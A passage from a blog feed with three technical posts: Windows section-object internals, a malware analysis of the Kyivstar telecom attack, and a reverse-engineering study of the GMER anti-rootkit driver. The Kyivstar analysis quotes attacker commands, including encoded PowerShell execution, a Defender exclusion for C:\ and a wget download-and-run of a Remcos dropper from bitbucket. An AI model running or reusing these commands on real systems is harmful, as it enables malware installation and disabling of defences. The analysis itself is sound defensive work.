MmMapViewInSystemCache maps only one cache slot, i e CapturedViewSize argument can contain a value-size of no more than 256KB. Below you can see is a pseudocode for the typical behavior of MmMapViewInSystemCache. Take a look at the comments, they explain the operations to be performed.

#define GetVirtualAddressByPte(PTE) ((PVOID)((ULONG)(PTE) << 10))

↧

Dissecting Windows Section Objects

December 3, 2022, 7:39 am

≫ Next: Ky1vstar cyberattack - under the hood of the malicious scripts

≪ Previous: Inside the Windows Cache Manager

Instead of introduction

We can't imagine Windows without section objects (or file mapping objects in terms of Windows API) and hardly can we find a Windows kernel subsystem that doesn't address it. The great idea behind section objects is that instead of calling Windows File APIs to work with a file, you can read virtual memory to get file data and write virtual memory to write file data. But this simple concept doesn't have simple things under the hood. To simplify the understanding of this difficult topic, we take Windows x86 edition with 32-bit pointers.

Don't worry if you can't understand all the things, even skilled Windows Internals readers may have difficulties with this topic. I would recommend to read the corresponding chapter from the Windows Internals book, because this blog post includes a lot of technical stuff and describes some kind of low level things.

The basic terms

So if you're ready, let's get started. First, we need to take a quick look at some technical terms, because without understanding any of them, we can't get the full picture. Next we'll focus on each of them in detail.

Section object - a kernel object described by the _SECTION structure. In the terms of Windows API it's called file mapping object. There're two types of section objects: pagefile-backed section and file-backed section. The first one is used when processes want to share a region of virtual memory. The file backed section reflects the contents of an actual file on disk.
Virtual Memory Manager (VMM) - a set of Mm functions in ntoskrnl that are responsible for all operations related to virtual and physical memory. The VMM also creates, maintains and deletes section objects as well as their substructures (see below).
I/O manager - in the context of our topic, these are Io functions in ntoskrnl that are used by the VMM to perform I/O operations with the mapped file data. This subsystem just initiates I/O operations, which are actually performed by file system drivers and disk drivers on device stacks.
PTE (Page Table Entry) - a structure that is used by the CPU and VMM to translate virtual addresses to physical ones.
Proto-PTE (Prototype PTE, PPTE) - a special type of invalid PTEs that is used only by the VMM (not CPU) to work with section objects and serves as an intermediate level for the translation virtual addresses to the mapped section pages (file data). PPTE points to a subsection and helps the VMM to find file data that should be located in the corresponding virtual memory pages.
PTE pointing to PPTE - a special type of hardware invalid PTEs /with zeroed valid (V) flag/ that is designed to find the corresponding PPTE in the Segment structure (PPT).
Prototype page table (PPT) - an array of PPTEs that is a part of Segment structure. Once the process maps a section, the VMM fills the hardware PTEs of the virtual pages with pointers to the elements of this array. When the process unmaps a section, the VMM removes pointers to PPTEs from hardware PTEs.
Segment - a data structure that provides the section object with the necessary information to calculate pointers to subsections, it also contains a PPT.
Segment Control Area (or just Control Area, CA) - a structure containing information required for performing I/O operations with file data in or from the mapped file. It's stored in the non-paged pool. With the help of CA the VMM can address the same file as binary and as executable.
Subsection - a data structure containing the necessary information to calculate offsets relative to the beginning of the mapped file using PPTEs. There is normally only one subsection if the file was mapped as binary. In case if it was mapped as executable, the number of subsections is the same as the number of sections in the mapped executable.
Page fault (#PF) for section - a situation (an exception) when a thread tries to access a virtual page mapped to the section, but its PTE is marked as not valid.
Modified page writer - system threads that are responsible for synchronizing modified file data in virtual memory with a disk file.
Page Frame, Page Frame Number, PFN database - terms describing physical memory: physical memory page, its number, numbers database. The latter includes information about all physical memory pages (page frames) and is designed to track status of each physical page (page frame).

Diving deeper into the Section kernel objects

Section is a kernel object that is created and maintained by the VMM. The MmCreateSection function creates the kernel object, allocating memory for it from the paged pool, initializes its fields, creates Control Area and Segment structures if needed (see MiCreateImageFileMap, MiCreateDataFileMap). To create an object, the caller of MmCreateSection must provide a pointer to a FileObject that describes the file to be mapped. Using the FileObject, the functions mentioned above initialize Control Area and Segment structures.

MmCreateSection is responsible not only for initializing a Section object, but also for initializing and maintaining important PSECTION_OBJECT_POINTERS FILE_OBJECT->SectionObjectPointer structure. You can see its definition below.

typedef struct _SECTION_OBJECT_POINTERS {PVOID DataSectionObject; PVOID SharedCacheMap; PVOID ImageSectionObject;} SECTION_OBJECT_POINTERS;

.DataSectionObject points to the Control Area structure if a file to be mapped as binary;
.ImageSectionObject points to the Control Area structure if a file to be mapped as executable;
.SharedCacheMap points to the shared cache map (see Inside the Windows Cache Manager). This field is used by the Cache Manager to cache file data.

As you can see all these three fields point to the structures needed to perform a certain type of file operations. The SECTION_OBJECT_POINTERS structure is created by the FSD when it gets a request to create (open) a file. The Cache Manager deals with .SharedCacheMap. Even if there are no sections for the file object (i e .DataSectionObject and .ImageSectionObject are NULL), .SharedCacheMap is almost always initialized (for disk files), because the Cache Manager caches parts of the file to provide quick access to its data. To create .DataSectionObject and .ImageSectionObject the VMM uses functions MiCreateDataFileMap and MiCreateImageFileMap.

NTSTATUS MmCreateSection(OUT PVOID *SectionObject, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize, IN ULONG SectionPageProtection, IN ULONG AllocationAttributes, IN HANDLE FileHandle OPTIONAL, IN PFILE_OBJECT File OPTIONAL)

Description of these arguments matches those ones from NtCreateSection.

Take a look at the Control Area structure

Segment control area (or just Control Area, CA) is a structure containing the information necessary to perform I/O operations with a section. It's stored in the nonpaged pool and is described by the following structure.

Control Area contains all the necessary data to perform I/O operations with the section.

Pointer to a Segment containing information from the PE file header and a PPTE array.
Pointer to a File Object describing mapped file that will be used for I/O operations.
An array of subsections, which is located after the CA structure in virtual memory, containing the necessary data to calculate file offsets.

The Control Area structure contains the flags that indicate what kind of data is addressed by the section. When the VMM creates a CA object for an executable file using MiCreateImageFileMap, its size is equal to the size of the CA structure, plus the size of one Subsection structure multiplied by the number of subsections (i e number of PE sections + 1 for PE header). It's important to note that all _SUBSECTION structures are located immediately after the Control Area and their number is stored in the NumberOfSubsections field. The subsections of one section (Control Area) are linked in the list via .NextSubsection. The !ca comment of WinDbg prints information about Control Area.

We can also explore these structures manually for the first three subsections.

Further, we'll discuss this output in more detail.

As it was mentioned earlier, the FILE_OBJECT structure has a very important structure called _SECTION_OBJECT_POINTERS. This structure addresses two CAs, one for a binary mapping type and second if the file is mapped as executable (the same file can be mapped as both binary and executable). These CAs point to different Segments with their own PPTE tables. This structure is maintained by the FSD.

Subsections are allocated in virtual memory strongly after the CA structure. For example, if the Control Area describes executable view, then ControlArea = ExAllocatePoolWithTag (NonPagedPool, sizeof(CONTROL_AREA) + (sizeof(SUBSECTION) * SubsectionsAllocated), 'iCmM').

A few words about Subsections

Subsection (_SUBSECTION) is a data structure containing the necessary information to calculate file offsets for the mapped file using the PPTEs. In case of a binary mapping type, there's only one subsection, but if the file is mapped as executable, then there're as many sections as there are in the executable. Since all the PTEs describing this subsection will have the same page protection bits (copy-on-write, read only, etc), it would be logically to maintain one data structure for all these PTEs. This data structure is called Subsection. All PPTEs point to the same corresponding subsection for both binary and executable mapping types. Moreover, the subsections contain the starting sector of the beginning of the PE's section. It's taken from the PE header as Raw_section_offset/SECTOR_SIZE. Also the subsection stores a pointer to the first PPTE in the segment's PPTE table and number of PTEs for this subsection (i e the number of virtual pages for this PE section, its VirtualSize rounded to a multiple of PAGE_SIZE). Having the address of the structure (executable mapping type), we can easily calculate the offset in the PE file, which this PPTE describes (as a distance between the base and current PTEs). If Pte is a pointer to PPTE, then the formula is.

(((PUCHAR)Pte - (PUCHAR)Subsection->SubsectionBase) / sizeof(PTE)) << PAGE_SHIFT + Subsection->StartingSector * SECTOR_SIZE

or for x86

(((PUCHAR)Pte - (PUCHAR)Subsection->SubsectionBase) / 4) << 12 + Subsection->StartingSector * SECTOR_SIZE

If Subsection is a ptr to the subsection, then the first PTE that describes it is FirstPte = &Subsection->SubsectionBase[0], and it's boundary, LastPte = &Subsection->SubsectionBase[Subsection->PtesInSubsection]. I e if X - the address of a PE file's subsection in virtual memory, then &Subsection->SubsectionBase[0] <= Pte < &Subsection->SubsectionBase[Subsection->PtesInSubsection].

Exploring the Segment structure

Unlike the Control Area structure that is designed to perform I/O operations with a file, the Segment stores information about a PE file that was taken from its PE header. In case of a binary file, this data isn't used. According to its purpose, a Segment also stores the Proto-PTE table (array) that addresses the offsets from the beginning of the mapped file through the Subsection structures. For example, if the VMM needs to load file data from the mapped file into virtual memory, it locates the corresponding Proto-PTE entry in the Segment table via not valid hardware PTE, which caused a page fault, from the page table. Next, using the Control Area structure and the calculated file offset, the VMM reads data from the file into virtual memory.

MmCreateSection creates segments using the following functions. It happens only if the file is mapped for the first time, otherwise the function gets a pointer to it via FileObject. Note that no matter how many sections have been created for the file object, there's always only one segment structure per type of mapping (binary, executable) for all of them. The same applies to Control Area structures, there's only one Control Area per type of mapping regardless of the number of created sections.

NTSTATUS MiCreateImageFileMap (IN PFILE_OBJECT File, OUT PSEGMENT Segment)

NTSTATUS MiCreateDataFileMap (IN PFILE_OBJECT File, OUT PSEGMENT *Segment, IN PUINT64 MaximumSize, IN ULONG SectionPageProtection, IN ULONG AllocationAttributes, IN ULONG IgnoreFileSizing)

As you can see MiCreateImageFileMap accepts fewer arguments, because it reads all the necessary information from the PE header of the executable file to be mapped. Description of other arguments you can find in NtCreateSection.

The following structure describes Segment.

ControlArea - pointer to the corresponding CA.
TotalNumberOfPtes - roughly mapped_file_size/PAGE_SIZE.
SizeOfSegment - size of the structure in bytes. MiCreateImageFileMap calculates it as SizeOfSegment = sizeof(SEGMENT) + (sizeof(MMPTE) * ((ULONG)TotalNumberOfPtes - 1)) + sizeof(SECTION_IMAGE_INFORMATION).
PrototypePte - pointer to an array of PPTE. In fact, it's NewSegment->PrototypePte = &NewSegment->ThePtes[0].
ThePtes - an array of PPTE, PPTE page table.

Perhaps the following image gives you a better understanding.

Behind the curtain of Section PTEs

As it was mentioned many times earlier, PPTEs and hardware PTEs pointing to them are key things to understand the virtual addresses translation concept for the mapped sections properly. The difference between them is that the first is stored in the Segment object, while the second in the process's page table (hardware PTE). Both can be in two major states - valid and invalid (P bit in the structure). Zeroed bit means that the mapped page is absent in physical memory and signals the VMM that its content should be read from disk. If the P bit is true, this virtual page is resident in physical memory and no additional actions are required from the VMM. The invalid PTE has a flag signaling that this PTE points to PPTE, i e belongs to the memory mapped file. Once a thread tries to access an invalid memory page, a page fault exception occurs and the VMM exception handler analyzes the PTE to learn what kind of pages it describes. There are several types of invalid PTEs, but we won't discuss this topic here. Also note that in case of a resident virtual page the VMM stores a pointer to PPTE and its value in the PFN database. Let's take a look at the format of these structures. You can the format of the PTE pointing to PPTE in the following pic.

Once you get the ProtoIndex, you can calculate the PPTE address with this formula: PrototypePteAddress = MmPagedPoolStart + PrototypeIndex << 2.

Below you can see PPTE format.

SubsectionAddress = MmSubsectionBase + PrototypeIndex << 3. MmSubsectionBase is usually equal to MmNonPagedPoolStart, because the WhichPool bit is usually set to 1.

Now, using our knowledge, we can put all the pieces together and make a complete picture of the actions for getting file data when a thread tries to access a virtual page belonging to a mapped file.

A little practice

Let's get to the Proto-PTE table. Take a random process, dump its basic information and go to the table.

We can go a bit deeper and calculate the offsets manually. To explore these structures it's better to take information from the cache slots as in the case of usual user-mode processes, the kernel can delay the creation of the Proto-PTE table until a thread addresses the mapped file data. I got a list of the cache slots on my system and select one describing the registry hive file NTUSER.DAT. Since it's a data file, there's only one subsection for its Control Area.

Now we can calculate the file offset starting from which the file is mapped to the cache slot using this formula.

FileOffset_LSN = (((PUCHAR)Pte - (PUCHAR)Subsection->SubsectionBase) / 4) << 12 + Subsection->StartingSector * SECTOR_SIZE

(E15B7208 - E15B7008) / 4 *1000 + 0 = 80000, this value you can see in the VACB structure above (Offset: 0x00080000).

Here's another example.

Now look at a more interesting case with PE files, Control Area of which has more than one subsection (one Subsection per one PE subsection). We can simplify our task and skip the first steps, starting with Control Areas. !memusage command can help us.

We can see the addresses of the Control Area structures in the first column. Print it for ole32.dll.

For clarity, copy the results to the table. If we open the PE file in the Cerbero PE Insider tool, we'll see that it has five sections. Note that the first subsection is allocated for the PE header.

We can see that the subsections number 2-3 are executable and match the PE sections .text and .orpc. This means that they address the PPTEs with code sections. The 4th subsection describes global data and has the copy-on-write protection. The rest are only available for read access.
The first subsection describes the file header and starts at offset 0. On disk, the PE header fits in two sectors and occupies one page of virtual memory. Thus, it can be described by one PPTE.
The second subsection describes the first PE file's code section. It starts from the second sector (0x400 / SECTOR_SIZE == 2). The virtual size of this section is 0x11EF5E, i e rounding it up to a multiple of the page size, 0x11EF5E + 0xA2 = 0x11F000 / PAGE_SIZE = 0x11F. This value matches the number of PTEs in the subsection. We can calculate number of sectors for the section from the header Raw size, 0x11F000 / 200 = 0x8F8 that equals the number of sectors for this section.
The third section also contains code and starts with sector number 0x11F400 / 0x200 = 0x8FA. The size is 0x6000 bytes (in this case we take the physical size as it larger than virtual), 0x6000/0x1000 = 6 PTEs.
The 4th section starts from 0x125400 / 0x200 = 0x92A, the size 0x7000 / 0x1000 = 7 PTEs.
The 5th section starts from 0x12BA00 / 0x200 = 0x95D, размер 0x2000 / 0x1000 = 2 PTEs.
The 6th, 0x12D200 / 0x200 = 0x969, размер 0xE000 / 0x1000 = 0xE PTEs.

Let's check out the formula mentioned above in practice. Take the third subsection, which describes the ole32.dll section starting at offset 0x8FA.

Dispatching #PF exceptions for mapped files

As we know the I/O Manager and VMM minimize the performance overhead by performing most of their operations asynchronously and by demand. Probably Windows developers don't know about this principle, because synchronous operations are default behavior for Windows API while the situation with Native and kernel API is reversed. This principle also applies to section objects. When MapViewOfFile Windows API returns control to the caller thread, it doesn't mean that mentioned subsystems copy the file data to virtual memory for RW just as if a thread modified the mapped file data in virtual memory, it doesn't mean that these changes will be immediately flushed to the physical file. Instead, the VMM delays the actual I/O operation until a thread of the process tries to access the file data by reading virtual memory. Once it happened, the #PF exception occurs and the VMM initiates an I/O operation to read file data into virtual memory. The common work in this case falls on the shoulders of MiDispatchFault function.

There're several possible situations for the sections describing file-backed data. Note that the section PPTE can be in the states inherent in a hardware PTE.

The PPTE is invalid and points to a subsection. In this case, the VMM needs to load the corresponding file data from disk into physical memory. The MiResolveMappedFileFault function is responsible for this, but an actual I/O operations is initiated by MiDispatchFault.
The PPTE is valid and points to a page frame. The VMM just need to fill the hardware PTE with this frame number.
The PPTE marked as copy-on-write.

MiDispatchFault calls MiResolveProtoPteFault passing it a pointer to PTE and PPTE. MiResolveProtoPteFault works with PPTE as well as with usual PTE, because PPTE can be in the same states as hardware PTE. The function starts by validating the PPTE, i e whether it's located in physical memory or not.

After checking the rights access to the page, the function checks the case when the PPTE is marked as Demand Zero and its hardware PTE marked as copy-on-write. In this case, the VMM resolves the fault by calling MiResolveDemandZeroFault and passing it a pointer to real PTE. Further, MiResolveProtoPteFault makes the PPTE valid, it can be in the following states: Demand Zero, Transition, Page File, Pagefile-backed, File-backed.

MiResolveProtoPteFault and MiResolveMappedFileFault functions perform important steps: reserve a page frame (physical page), initializes the corresponding entry in the PFN database, prepare a MDL structure and a special ReadBlock structure for further disk read operation. You can see the entire process in the following diagram.

Inside the Page Writers

In the last part of this blog post we're gonna discuss the Mapped Page Writer subsystem (thread), which is a part of the Modified Page Writer subsystem (or just thread). At this point we already know how the VMM and I/O manager read mapped file data to process's virtual memory in order to provide access to it. But what about writing file data? As was mentioned above, the VMM minimizes the performance overhead by performing its operations that involve disk I/O by demand. That's why the actual read operation on a memory mapped file only happens when a thread tries to access a file view and not when executing MapViewOfFile.

The VMM has two system threads called MiModifiedPageWriter and MiMappedPageWriter. In fact, MiModifiedPageWriter just creates MiMappedPageWriter thread and shifts the rest of work to MiModifiedPageWriterWorker. These last two functions (MiModifiedPageWriterWorker and MiMappedPageWriter) are two infinite loops that can be called Modified Page Writer, because they implement all its functionality. The first one is responsible for gathering information about modified pages belonging to the page file (MiGatherPagefilePages) and about modified pages belonging to the mapped files (MiGatherMappedPages). It also adjusts the frequency of the flushing operations or how often modified pages will be written to disk. The second thread takes the information prepared by MiModifiedPageWriterWorker and performs the actual disk write operation (for mapped files).

The main part of MiModifiedPageWriterWorker is an infinite loop with waiting on the MiMappedPagesTooOldEvent event. This event can be set in several circumstances and adjusts the frequency of performing flushing. To provide a fixed time frequency of flushing, the VMM uses a timer object and a DPC object (MiModifiedPageWriterTimerDpc), i e the DPC handler MiModifiedPageWriterTimerDispatch calls every time a timer expires. Since this handler is executed with high IRQL DPC_DISPATCH (2, the scheduler level), the system ensures its operation in privileged mode. The MmInitSystem function initializes this object during the system startup and when MiModifiedPageWriterWorker need to gather dirty memory pages for the first time, it sets this timer. The timer is set for 3 seconds.

Forgot to mention that physical memory pages (frames) that were modified since the section was mapped are called Dirty. The CPU sets this bit at the first write operation to the page. Once the VMM processes this page in a certain way, it resets this bit. Without it, the VMM wouldn't be able to track the changes made by the thread on the mapped page and synchronize them with the file data on disk.

For the convenience of flushing file data and, in order to reduce overhead, MiMappedPageWriter doesn't flush every dirty page separately, instead, MiGatherMappedPages gathers in the packet (MMMOD_WRITER_MDL_ENTRY) a set of dirty frames that belong to the same section and are adjacent to this dirty frame. The MMMOD_WRITER_MDL_ENTRY structure describes a set of dirty PFNs that should be written to disk. In fact, the VMM uses two MDL lists, one for a paging file and another for sections. The pool of these MDL items is allocated in the NtCreatePagingFile function that is responsible for creating page files. The same for memory mapped files - MmMappedFileHeader.

As it was mentioned above, MiMappedPageWriter is responsible for initiating disk write operation, here's its pseudocode, in which the details are omitted.

Please take a look at the following diagram to understand the entire process.

However, a thread can force the VMM to write modified data to disk immediately. Windows API provides applications with the FlushViewOfFile function. The VMM's internal function MiFlushSectionInternal is responsible for flushing section data and calls IoAsynchronousPageWrite to perform disk write operation.

Instead of conclusion

Thank you for your attention and hope you enjoyed the blog post. Windows Sections is quite a difficult topic, especially, for beginners, because you should already have an idea of other Windows kernel subsystems to understand it properly.

If you have any comments or remarks, please let me know and feel free to contact. I'm going to cover several other topics on the Windows VMM internals such as the PFN database, hyperspace and virtual address translation.

↧

Ky1vstar cyberattack - under the hood of the malicious scripts

April 5, 2024, 5:15 am

≫ Next: GMER - the art of exposing Windows rootkits in kernel mode

≪ Previous: Dissecting Windows Section Objects

The attack overview

In mid-December, it was revealed that a devastating cyberattack hit Ukr@ine's biggest telecommunications company. The attack disabled the company's services for days (!), leaving over twenty million Ukrainians without mobile communication and internet access.

Ukrainian officials described the attack as having disastrous consequences, causing the complete destruction of the telecoms operator's core infrastructure. The attackers managed to wipe out nearly all data, including thousands of virtual servers and PCs.

Below, you can see the attack chain, which begins with receiving a phishing email containing a malicious .zip attachment with a .doc file inside.

email => attach1.zip => attach1.rar + attach2.rar => attach.rar (password protected) => .doc (vba) => SMB \\89_23_98_22\LN\GB.exe => powershell bitbucket_org/.../wsuscr.exe

The .doc file merely shows a picture that prompts the potential victim to enable editing and content - in other words, to lower security settings and permit the execution of a malicious macro.

To evade anti-malware checks on the email server and victim's system, the doc file is packed into a multi-layered, password-protected archive. It contains a VBA macro that initiates the infection process by executing the malware downloader.

Below you can see the detailed (trimmed for clarity) execution flow.

As you can see, the attackers actively use cmd and PS scripts to initiate malicious actions from trusted processes. These scripts are either fully or partially encoded and may contain packed data. To run PS scripts from cmd, the following command construction is used.

powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('...')) | Invoke-Expression"

To evade detection, the PS script to be executed is base64 encoded. The batch file passes the encoded script to PowerShell, instructing it to decode it on-the-fly via the command line rather than saving the script to disk.

Exploring the scripts

After decompressing the final RAR archive, the victim opens the malicious .doc file containing a malicious VBA macro. We can extract it using two tools: Frank Boldewin's OfficeMalScanner and Didier Stevens' oledump. Let's take a look at both.

> OfficeMalScanner.exe C:\Test\malicious.doc info

This command dumps macros into the MALICIOUS.DOC-Macros folder. To obtain oledump, we need to install it using the "pip install olefile" command.

Next, dump the document structure.

We're interested in the streams marked with M, where macros are stored in a compressed state. The following command decompresses the macro locating in the 9th stream.

oledump.py -s 9 --vbadecompressskipattributes C:\Test\malicious.doc >C:\Test\s9_malicious_doc.txt

This macro, shown in the picture below, serves only one purpose: to download and run the malware downloader GB.exe from the SMB share. Before doing so, it also opens the shared folder in a new Explorer window and closes it after execution.

The process tree.

The downloader GB.exe drops the res.bat and executes commands from it.

:: Download test2.exe from the share to the local folder wo any messages

echo f | xcopy /s test2.exe "%temp%\persistent2\test2.exe">NUL

:: Execute an encoded PS script

powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('ZgAA==')) | Invoke-Expression"

This bat file copies another executable, test2.exe, from the share and executes an encoded PS script. The bypass commands within the script body are packed.

This PS script implements an interesting UAC bypass trick using Fodhelper binary in just three commands. Consequently, it executes the downloaded Remcos executable with elevated privileges. The unpacked cmd elevation commands appear as follows.

As we can see from the malware execution flow pic above, the downloader also runs another executable, test2.exe, in addition to executing res.bat.

> cmd.exe /c res.bat && test2.exe

This test2 executable runs another interesting batch file named test2.bat.

It runs another PS script designed to add the entire C drive to Defender's exclusion list, which requires admin rights. As usual, the commands are base64 encoded.

$pwd = "Add-MpPreference -ExclusionPath C:\"

$pwd | Invoke-Expression

This execution chain ends with the launch of Remcos dropper named wsuscr.exe from the aforementioned PS script.

wget "https://bitbucket.org/olegovich-007/777/downloads/wsuscr.exe" -outfile "$env:APPDATA\wsuscr.exe"

Invoke-Expression -Command "$env:APPDATA\wsuscr.exe"

Remcos serves as a backdoor, granting attackers full access to the compromised system.

References

https://cert.gov.ua/article/6276824

https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1

https://www.joesandbox.com/analysis/1365471/0/html

https://www.reuters.com/world/europe/russian-hackers-were-inside-ukraine-telecoms-giant-months-cyber-spy-chief-2024-01-04/

https://www.hybrid-analysis.com/sample/d698994e527111a6ddd590e09ddf08322d54b82302e881f5f27e3f5d5368829c/658988e479a329c125013938

https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

↧

GMER - the art of exposing Windows rootkits in kernel mode

April 5, 2024, 1:10 pm

≫ Next: Guntior - the story of an advanced bootkit that doesn't rely on Windows disk drivers

≪ Previous: Ky1vstar cyberattack - under the hood of the malicious scripts

📌 Chapters:

Introduction
Some basic terms
Howto
Exploring Win11 disk subsystem
Set up a secure environment
Overview of the driver
Patching kernel data
Securing disk I/O operations
Securing file I/O operations
Tracing kernel mode code
About PPL'ed processes

📝 Introduction

GMER is a well-known powerful anti-rootkit tool, which has been used for years by Windows IT pros to detect the presence of rootkits in the system. A rootkit is a kind of malicious software intended to hide the components and artifacts of malware. Historically, rootkits can be divided into two types: user mode (Ring 3) and kernel mode (Ring 0). Nowadays, there are also malicious implants designed to work at the hypervisor (Ring -1) and SMM (Ring -2) privilege levels. We're gonna focus on the most common type, the kernel mode rootkit, and will simply refer to it as a rootkit.

Rootkits were popular in the Windows x86 era, when there were no restrictions on intercepting anything in privileged kernel mode. Typically, rootkits use three types of techniques: hooking, patching, DKOM. We won't delve into them in detail, but it's worth noting that the first one is used to replace a pointer to the necessary function in the function table, the second involves inline code patching and the third is used to modify members of kernel objects such as KTHREAD or EPROCESS.

The authors of other well-known anti-rootkits have dropped their support due to the growing dominance of the x64 platform and the emergence of new Windows versions. The restrictions imposed on kernel mode code on this platform have affected not only rootkits but also anti-rootkits. Rootkits have lost the ability to gain control over the system making anti-rootkit checks useless. Nevertheless, some rootkits were able to bypass the new security perimeter by rebooting the system with the test signing bootloader option. One of them was Necurs, along with several other bootkits.

Unlike other anti-rootkits, GMER has an x64 version of the driver, although doesn't support modern versions of Windows. It has an impressive arsenal of clever tricks for detecting the presence of rootkits and unhooking them, which can be useful nowadays. Since malware aims to detect the launch of GMER, it drops the driver to disk with a random name and deletes it once it's loaded. This way, the malware can't block its loading. Within the tool, the driver, which is located in the resource section, is packed twice: the tool itself is packed with UPX and its unpacked version stores the compressed driver. The tool's executable is also landed on the disk with a random name.

📖 Some basic terms

Anti-rootkit - a standalone tool/utility or component within a security product that is designed to deeply inspect Windows environment at both user and kernel mode levels to detect system anomalies.

Direct Kernel Object Manipulation (DKOM) - a rootkit technique that means modification of Windows kernel objects through direct access to them without any API.

Disk driver - a Windows driver called disk.sys that is responsible of processing disk I/O operations usually coming from the partition manager (PartMgr.sys), volume manager (Volmgrx.sys) or any other clients via \PhysicalDriveX objects. In fact, the classpnp.sys driver dispatches all disk.sys driver requests.

Disk port driver - while disk.sys implements a high-level logic of communication with various disk types connected to different interfaces, the disk port driver is designed to communicate with a specific disk device. There are several common disk port drivers such as atapi.sys, scsiport.sys, ataport.sys, storport.sys.

🔬 Howto

To extract the driver, the dropper first should be unpacked. The driver inside the resource section of the dropper is compressed with zlib. In order to decompress it, I personally simply used the built-in VirusTotal decompressor. In the Relations tab, you can find a link to the report with the decompressed driver.

C:\test>upx -d -o C:\test\gmer\gmer_unpacked.exe C:\test\gmer\gmer.exe

To make the analysis process faster, I ran GMER on my Win7 SP1 x64 VM and took a kernel memory dump. Since the dump contains the driver with already initialized variables and decrypted text strings, we can determine the purpose of each pointer in the disassembled version of the driver. Next, we need to rebase the driver loaded into IDA so that the offsets of both drivers are identical.

Edit->Segments->Rebase program...

🔐 Set up a secure environment

Any anti-rootkit shouldn't trust the environment in which it works. Members of kernel mode objects, pointers in dispatch tables, the integrity of the WinNT kernel executable, and drivers - all this stuff may already be compromised before an anti-rootkit is launched.

A secure environment means a set of artifacts such as kernel object pointers, their values, kernel function pointers, that have been retrieved or restored in a secure way and are suitable for further use.

GMER takes the following actions to initialize its own secure environment in DriverEntry.

To construct names of driver objects of interest on the stack, such as \Filesystem\Ntfs, \Driver\Disk, \Driver\atapi.
To select kernel object offsets depending on the OS version, including, EPROCESS.Peb, EPROCESS.UniqueProcessId, KPROCESS.ThreadListHead, ETHREAD.StartAddress, etc.
In case of an unknown Windows version, it obtains those offsets through manual analysis of the appropriate ntoskrnl functions, such as PsGetProcessPeb, PsGetProcessSectionBaseAddress, etc.
Dynamically resolves some important imports such as IofCompleteRequest and IofCallDriver using MmGetSystemRoutineAddress.
To map the NT layer DLL ntdll.dll, which is used further to get additional information.
To obtain the start address of loaded Ntfs.sys and Fastfat.sys, locate the entry point and scan it for a specific signature to retrieve the real address of their IRP_MJ_CREATE handlers.
To get information about loaded ataport.sys and scsiport.sys. These drivers are responsible for low-level disk communication.
To use its own PE export parser and get the addresses of the sensitive functions listed below.

For most of the kernel objects offsets, GMER obtains them by analyzing the following functions.

The following driver function looks up for most offsets due to their simple structure at the beginning.

The situation varies when it comes to finding the corresponding EPROCESS and ETHREAD fields used to collect information about threads, as different Windows versions use a different number of lists.

GMER obtains the addresses of nt!Zw exports (services) in a tricky way. First, it obtains the KeServiceDescriptorTable address by finding a 8-byte signature "8B F8 C1 EF 07 83 E7 20" and two other values in ntoskrnl, which represent the following instructions inside the KiSystemServiceStart function. As a starting point, it takes the address of the nt!strnicmp function and scans it to the KdDebuggerNotPresent variable.

The disposition of the target ntoskrnl functions.

To obtain the address of a specific ntoskrnl!Zw function, it maps Ntdll and retrieves from it the address of the required export function. Next, it grabs the System Service Number (SSI) from the second instruction of the export, which is identical for all of them: mov eax, SSN (B8 3F 00 00 00).

With these pieces together, the process of obtaining ntoskrnl exports for Zw services looks as follows:

To get an export function address from the mapped Ntdll.
To take the SSN from the second instruction of the function.
To use this SSN as an index in the KeServiceDescriptorTable.KiServiceTable array and calculate the appropriate Zw function address. Note that the pointers in this array are protected by PatchGuard.

An interesting fact is that when scanning ntoskrnl data between strnicmp and KdDebuggerNotPresent to find the address of KeServiceDescriptorTable, the driver doesn't validate the current pointer with MmIsAddressValid. Since the space between these symbols belongs to multiple ntoskrnl sections, one of them may be INIT, which may be already discarded from memory.

📖 Overview of the driver

The driver provides its user mode counterpart with various valuable interfaces aimed at obtaining trustworthy data about the Windows environment. These features are available via the appropriate IOCTL codes listed below. After obtaining the necessary data, GMER compares it with the data obtained through regular Windows API and report to the user about the detected anomalies.

Basically, to supply the requested data, the driver leverages Windows kernel API, low-level disk and file system access skipping the intermediate filters, DKOM and custom implementation of some Windows kernel functions.

During initialization, the driver creates a separate thread to execute the following operations in the System process context: shutdown system, read process memory, suspend thread, query information about thread, process, system, and system registry. When the GMER's DeviceIoControl handler, which is executed in the current process context, recognizes one of those IOCTLs, it builds the context structure with a pointer to a specific handler and sets the appropriate event that triggers another thread to execute it.

📚 Exploring Win11 disk subsystem

Before we start discussing the topic, let's take a look at some basic aspects of Windows disk subsystem.

The Disk.sys driver is responsible for dispatching storage devices I/O. The client must specify the offset from the beginning of the disk and data length. The driver in turn redirects this request to one of the corresponding disk port drivers.

We can start by exploring disk device stack and go deeper.

As we can see there are four devices on that device stack.

The first one belongs to the partition manager and presents the device of the raw disk partition. Partmgr forwards the disk I/O request further to the disk driver, providing it an LBA instead of a partition offset.
The second device belongs to the disk driver itself, described above.
The next device was created by the common driver acpi.sys which, essentially simply forwards disk I/O requests to the port driver. The responsibilities of Acpi. sys include support for power management and Plug and Play (PnP) device enumeration.
The latter belongs to the iaStorVD disk port driver (Intel Rapid Storage Technology) and is used in many computers with Intel chipsets. Being a disk port driver, it's responsible for low-level communication with a specific storage device type, including, initializing the storage controller and identifying and attaching storage devices.

But the whole picture of processing disk requests is a bit more complicated, since there are more drivers that are indirectly involved in it. Let's inspect those driver objects on the disk device stack.

As we can see both drivers redirect their driver dispatch routines to another drivers. In the case of disk.sys its table of driver dispatch routines points to Classpnp functions. The driver name stands for "Class Plug and Play Driver" and is responsible for managing Plug and Play (PnP) devices. Classpnp handles the device requests addressed to disk.sys. classpnp!ClassGlobalDispatch, in turn, simply redirects the execution flow to the appropriate classpnp dispatch function. Therefor, these items of the disk driver dispatch table are perfect targets for any rootkit (if it can defeat PatchGuard first).

If we know the pointer to the disk device object, we can get information about the real dispatch table of the classpnp driver.

